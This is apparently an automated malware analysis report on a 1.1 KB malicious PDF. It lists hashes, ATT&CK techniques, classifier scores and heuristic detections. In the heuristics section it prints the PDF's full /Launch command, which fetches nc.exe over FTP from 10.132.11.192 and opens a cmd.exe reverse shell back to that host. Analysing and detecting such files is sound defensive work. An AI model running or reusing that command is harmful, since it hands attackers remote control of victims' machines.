Malicious PDF — malware analysis report

Static analysis result for SHA-256 930d9219cc758aea…

MALICIOUS

PDF

1.1 KB
MD5: c4068f28a78b90b46c78797bc2ccb022 SHA-1: 4c2e1f6e143d2e2f1b0e3075d8fa322bfe38ebf9 SHA-256: 930d9219cc758aea1749dbb8882883c30edfcff820d7c79ba0794e1034cae5d2
210 Risk Score

Malware Insights

MITRE ATT&CK
T1059.003 Windows Command Shell T1204.002 Malicious File T1105 Ingress Tool Transfer

The PDF file contains a launch action that executes a command-line payload. This payload is designed to download a Netcat binary from the IP address 10.132.11.192 using FTP and then execute it to establish a reverse shell. The heuristic firings strongly indicate a malicious PDF exploit. The command execution and subsequent download of a tool for remote access are the primary malicious activities observed.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9996

Heuristics 3

  • Launch action critical PDF_LAUNCH
    PDF contains a /Launch action whose target is an executable, URL, or UNC path — can start an external application
  • /Launch action target: cmd.exe critical PDF_LAUNCH_COMMAND
    PDF /Launch action specifies an executable target with parameters '/c echo binary nc.exe>C:\\ftpcmd.txt && echo get nc.exe C:\\nc.exe>>C:\\ftpcmd.txt && echo quit>>C:\\ftpcmd.txt && ftp -s:C:\\ftpcmd.txt -A 10.132.11.192 && C:\\nc.exe -d -e cmd.exe 10.132.11.192 999' — references a known-dangerous executable (cmd, PowerShell, etc.).
  • ClamAV: Pdf.Exploit.Agent-36271 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Pdf.Exploit.Agent-36271

Open this report in the interactive analyzer, or submit your own file for analysis.